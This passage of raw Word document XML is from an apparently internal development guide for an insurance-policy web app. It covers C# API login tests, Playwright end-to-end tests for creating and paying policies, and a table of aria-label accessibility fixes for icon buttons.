          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="E2E8F0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">            Password = "Test@1234"</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await _client.PostAsJsonAsync("/api/auth/register", registerPayload);</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 Act</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E293B" w:val="clear"/>
        <w:spacing w:after="20" w:before="20" w:line="276"/>
        <w:ind w:left="200" w:right="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="E2E8F0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">        var loginPayload = new { Email = "test@test.com", Password = "Test@1234" };</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E293B" w:val="clear"/>
        <w:spacing w:after="20" w:before="20" w:line="276"/>
        <w:ind w:left="200" w:right="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="E2E8F0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">        var response = await _client.PostAsJsonAsync("/api/auth/login", loginPayload);</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 Assert</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E293B" w:val="clear"/>
        <w:spacing w:after="20" w:before="20" w:line="276"/>
        <w:ind w:left="200" w:right="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="E2E8F0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">        response.StatusCode.Should().Be(HttpStatusCode.OK);</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E293B" w:val="clear"/>
        <w:spacing w:after="20" w:before="20" w:line="276"/>
        <w:ind w:left="200" w:right="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="E2E8F0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">        var result = await response.Content.ReadFromJsonAsync&lt;ApiResponse&lt;AuthResponseDto&gt;&gt;();</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E293B" w:val="clear"/>
        <w:spacing w:after="20" w:before="20" w:line="276"/>
        <w:ind w:left="200" w:right="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="E2E8F0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">        result!.Data.Token.Should().NotBeNullOrEmpty();</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w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="140" w:before="320"/>
      </w:pPr>
      <w:bookmarkStart w:name="sec7-3" w:id="1"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="4F46E5"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">7.3  Frontend — Playwright E2E Tests</w:t>
      </w:r>
      <w:bookmarkEnd w:id="1"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E293B" w:val="clear"/>
        <w:spacing w:after="20" w:before="20" w:line="276"/>
        <w:ind w:left="200" w:right="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="E2E8F0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"># Install Playwright</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E293B" w:val="clear"/>
        <w:spacing w:after="20" w:before="20" w:line="276"/>
        <w:ind w:left="200" w:right="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="E2E8F0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">npm init playwright@latest</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playwright.config.ts</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E293B" w:val="clear"/>
        <w:spacing w:after="20" w:before="20" w:line="276"/>
        <w:ind w:left="200" w:right="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="E2E8F0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">export default defineConfig({</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E293B" w:val="clear"/>
        <w:spacing w:after="20" w:before="20" w:line="276"/>
        <w:ind w:left="200" w:right="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="E2E8F0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">    testDir: "./e2e",</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E293B" w:val="clear"/>
        <w:spacing w:after="20" w:before="20" w:line="276"/>
        <w:ind w:left="200" w:right="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="E2E8F0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">    baseURL: "http://localhost:4200",</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E293B" w:val="clear"/>
        <w:spacing w:after="20" w:before="20" w:line="276"/>
        <w:ind w:left="200" w:right="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="E2E8F0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">    use: { trace: "on-first-retry" },</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E293B" w:val="clear"/>
        <w:spacing w:after="20" w:before="20" w:line="276"/>
        <w:ind w:left="200" w:right="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="E2E8F0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">});</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="160"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E293B" w:val="clear"/>
        <w:spacing w:after="20" w:before="20" w:line="276"/>
        <w:ind w:left="200" w:right="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="E2E8F0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">// e2e/policy-crud.spec.ts</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E293B" w:val="clear"/>
        <w:spacing w:after="20" w:before="20" w:line="276"/>
        <w:ind w:left="200" w:right="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="E2E8F0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">import { test, expect } from "@playwright/test";</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test.beforeEach(async ({ page }) =&gt; {</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E293B" w:val="clear"/>
        <w:spacing w:after="20" w:before="20" w:line="276"/>
        <w:ind w:left="200" w:right="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="E2E8F0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">    await page.goto("/login");</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E293B" w:val="clear"/>
        <w:spacing w:after="20" w:before="20" w:line="276"/>
        <w:ind w:left="200" w:right="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="E2E8F0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">    await page.fill("#email", "admin@test.com");</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E293B" w:val="clear"/>
        <w:spacing w:after="20" w:before="20" w:line="276"/>
        <w:ind w:left="200" w:right="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="E2E8F0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">    await page.fill("#password", "Admin@123");</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E293B" w:val="clear"/>
        <w:spacing w:after="20" w:before="20" w:line="276"/>
        <w:ind w:left="200" w:right="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="E2E8F0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">    await page.click("button[type=submit]");</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E293B" w:val="clear"/>
        <w:spacing w:after="20" w:before="20" w:line="276"/>
        <w:ind w:left="200" w:right="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="E2E8F0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">    await expect(page).toHaveURL("/dashboard");</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E293B" w:val="clear"/>
        <w:spacing w:after="20" w:before="20" w:line="276"/>
        <w:ind w:left="200" w:right="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="E2E8F0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">});</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test("create policy → appears in list", async ({ page }) =&gt; {</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E293B" w:val="clear"/>
        <w:spacing w:after="20" w:before="20" w:line="276"/>
        <w:ind w:left="200" w:right="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="E2E8F0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">    await page.goto("/policies/new");</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await page.fill("#policyHolderName", "Test Holder");</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E293B" w:val="clear"/>
        <w:spacing w:after="20" w:before="20" w:line="276"/>
        <w:ind w:left="200" w:right="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="E2E8F0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">    await page.fill("#formEmail",        "holder@test.com");</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E293B" w:val="clear"/>
        <w:spacing w:after="20" w:before="20" w:line="276"/>
        <w:ind w:left="200" w:right="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="E2E8F0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">    await page.selectOption("#policyTypeId",  "1");</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E293B" w:val="clear"/>
        <w:spacing w:after="20" w:before="20" w:line="276"/>
        <w:ind w:left="200" w:right="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="E2E8F0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">    await page.selectOption("#familyMemberId","1");</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E293B" w:val="clear"/>
        <w:spacing w:after="20" w:before="20" w:line="276"/>
        <w:ind w:left="200" w:right="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="E2E8F0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">    await page.fill("#premiumAmount", "12000");</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E293B" w:val="clear"/>
        <w:spacing w:after="20" w:before="20" w:line="276"/>
        <w:ind w:left="200" w:right="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="E2E8F0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">    await page.fill("#startDate",    "2025-04-01");</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E293B" w:val="clear"/>
        <w:spacing w:after="20" w:before="20" w:line="276"/>
        <w:ind w:left="200" w:right="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="E2E8F0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">    await page.fill("#endDate",      "2030-03-31");</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await page.click("button[type=submit]");</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 Should redirect to policy detail page</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E293B" w:val="clear"/>
        <w:spacing w:after="20" w:before="20" w:line="276"/>
        <w:ind w:left="200" w:right="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="E2E8F0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">    await expect(page).toHaveURL(/\/policies\/\d+$/);</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E293B" w:val="clear"/>
        <w:spacing w:after="20" w:before="20" w:line="276"/>
        <w:ind w:left="200" w:right="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="E2E8F0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">    await expect(page.locator(".page-title"))</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E293B" w:val="clear"/>
        <w:spacing w:after="20" w:before="20" w:line="276"/>
        <w:ind w:left="200" w:right="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="E2E8F0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">        .toContainText("POL-");</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E293B" w:val="clear"/>
        <w:spacing w:after="20" w:before="20" w:line="276"/>
        <w:ind w:left="200" w:right="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="E2E8F0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">});</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test("mark policy as paid → next installment advances", async ({ page }) =&gt; {</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E293B" w:val="clear"/>
        <w:spacing w:after="20" w:before="20" w:line="276"/>
        <w:ind w:left="200" w:right="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="E2E8F0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">    await page.goto("/policies/1");</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E293B" w:val="clear"/>
        <w:spacing w:after="20" w:before="20" w:line="276"/>
        <w:ind w:left="200" w:right="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="E2E8F0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">    const initialDate = await page</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E293B" w:val="clear"/>
        <w:spacing w:after="20" w:before="20" w:line="276"/>
        <w:ind w:left="200" w:right="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="E2E8F0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">        .locator("[data-label='Next Installment']").textContent();</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await page.click("button:has-text('Pay')");</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E293B" w:val="clear"/>
        <w:spacing w:after="20" w:before="20" w:line="276"/>
        <w:ind w:left="200" w:right="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="E2E8F0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">    await page.click("button:has-text('Confirm Payment')");</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await expect(page.locator("[data-label='Next Installment']"))</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E293B" w:val="clear"/>
        <w:spacing w:after="20" w:before="20" w:line="276"/>
        <w:ind w:left="200" w:right="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="E2E8F0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">        .not.toContainText(initialDate!);</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E293B" w:val="clear"/>
        <w:spacing w:after="20" w:before="20" w:line="276"/>
        <w:ind w:left="200" w:right="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="E2E8F0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">});</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:after="200" w:before="400"/>
      </w:pPr>
      <w:bookmarkStart w:name="sec8" w:id="1"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1E1B4B"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve">Section 8 — Accessibility Fixes</w:t>
      </w:r>
      <w:bookmarkEnd w:id="1"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="160"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="140" w:before="320"/>
      </w:pPr>
      <w:bookmarkStart w:name="sec8-1" w:id="1"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="4F46E5"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">8.1  ARIA Labels on Icon Buttons</w:t>
      </w:r>
      <w:bookmarkEnd w:id="1"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="100" w:before="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="374151"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Every button that contains only an icon and no visible text must have an aria-label attribute. This applies to all .btn-icon buttons throughout the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3730A3" w:sz="4"/>
              <w:left w:val="single" w:color="3730A3" w:sz="4"/>
              <w:bottom w:val="single" w:color="3730A3" w:sz="4"/>
              <w:right w:val="single" w:color="3730A3" w:sz="4"/>
            </w:tcBorders>
            <w:shd w:fill="4F46E5" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="100"/>
              <w:left w:type="dxa" w:w="140"/>
              <w:bottom w:type="dxa" w:w="100"/>
              <w:right w:type="dxa" w:w="140"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Component</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2600"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="3730A3" w:sz="4"/>
              <w:left w:val="single" w:color="3730A3" w:sz="4"/>
              <w:bottom w:val="single" w:color="3730A3" w:sz="4"/>
              <w:right w:val="single" w:color="3730A3" w:sz="4"/>
            </w:tcBorders>
            <w:shd w:fill="4F46E5" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="100"/>
              <w:left w:type="dxa" w:w="140"/>
              <w:bottom w:type="dxa" w:w="100"/>
              <w:right w:type="dxa" w:w="140"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Element</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4360"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="3730A3" w:sz="4"/>
              <w:left w:val="single" w:color="3730A3" w:sz="4"/>
              <w:bottom w:val="single" w:color="3730A3" w:sz="4"/>
              <w:right w:val="single" w:color="3730A3" w:sz="4"/>
            </w:tcBorders>
            <w:shd w:fill="4F46E5" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="100"/>
              <w:left w:type="dxa" w:w="140"/>
              <w:bottom w:type="dxa" w:w="100"/>
              <w:right w:type="dxa" w:w="140"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Add aria-label</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policy-list</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2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Mark as Paid button</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="43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aria-label="Mark policy as paid"</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="24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policy-list</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="26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View button</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="436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aria-label="View policy details"</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policy-list</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2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Edit button</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="43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aria-label="Edit policy"</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="24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policy-detail</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="26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Share button</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="436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aria-label="Share policy"</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policy-detail</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2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Pay button</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="43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aria-label="Record payment"</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="24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navbar</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
